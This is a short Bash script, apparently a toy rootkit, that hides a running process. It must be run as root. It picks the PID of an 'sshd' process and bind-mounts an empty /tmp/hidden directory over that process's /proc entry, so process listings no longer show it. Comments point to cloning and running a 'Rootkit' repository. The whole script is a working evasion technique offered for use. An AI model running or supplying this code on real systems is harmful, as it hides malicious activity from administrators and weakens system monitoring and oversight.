#!/usr/bin/env bash
# A simple script to hide a process
#git clone https://github.com/karanbir-singh001/Rootkit
#chmod +x Rootkit; ./Rootkit

function mkFolder() {
        rm -rf /tmp/hidden
        mkdir /tmp/hidden
        if [[ $? -ne 0 ]]; then
                echo "[err] An error has ocurred" >&2
                exit 1
        fi
}

function hideProcess() {
        mount --bind /tmp/hidden /proc/$pid
}


if [[ $(id -u) -ne "0" ]]; then
        echo "[error] You must run this script as root" >&2
        exit 1
fi

arr=('|' '/' '-' '\')

for c in $(seq 1 5); do
        for elt in ${arr[*]}; do
                echo -ne "\r\033[<1>AInitializing $elt" && sleep 0.1;
        done
done

echo -ne "\r"
pid=$(ps auxf | grep "sshd" | head -n 1 | awk -F' ' '{print $2}')

mesg="Your PID is successfully hidden!"

mkFolder && hideProcess && \

for i in $(seq 1 ${#mesg}); do
        echo -ne "${mesg:i-1:1}"
        sleep 0.07
done
echo -ne "\n"
